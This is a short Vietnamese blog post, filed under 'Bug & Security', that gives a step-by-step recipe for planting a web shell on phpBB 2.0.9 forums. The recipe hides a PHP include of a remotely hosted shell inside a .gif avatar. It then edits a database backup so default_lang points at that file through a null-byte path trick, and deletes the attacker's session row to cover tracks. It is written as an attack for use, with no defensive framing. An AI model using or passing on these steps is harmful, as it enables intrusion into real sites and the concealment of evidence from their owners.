Portfolio
My Blog
Scroll down to discover
Search
Categories

include shell với phpBB

June 10, 2008Category : Bug & Security

phpBB version : 2.0.9
chuẩn bị sẵn 1 con shell
upload shell txt lên host nào đó
chèn đoạn code sau vào notepad roài save với đuôi .gif

<php include “http://link…/shell.txt”; ?>

khi ta đã vào dc admincp của phpBB
chuyển tới config … chọn cho upload avatar = Yes

Sau đó backup lại database
Vô lại usercp upload cái ảnh include shell lên
sau đó xem tên ảnh avatar sau khi upload là gì nhé
Sau khi download backup về mở nó ra
tìm dòng :

Insert into phpbb_config (config_name, config_value) Values (‘default_lang’, ‘english’);

chèn thêm:

update phpbb_config set configvalue=concat(‘english/../../images/avatars/tên file ảnh bạn đã up.gif’, char(0)) where config_name=’default_lang’;

sau đó search phpBB_sessions
dưới insert to
thêm

delete from phpbb_sesions where session_id=’ ở chỗ này bạn nhìn lên cái dòng insert to gần cuối có cái value của mình thì chèn nó vào đây ‘;

chỗ này nhằm xóa dấu vết thoai

xong roài
giờ save
roài restore lại thoai

Restore xong vào http://site/phpBB/faq.php

01.
© Oliver / All rights reserved.
To top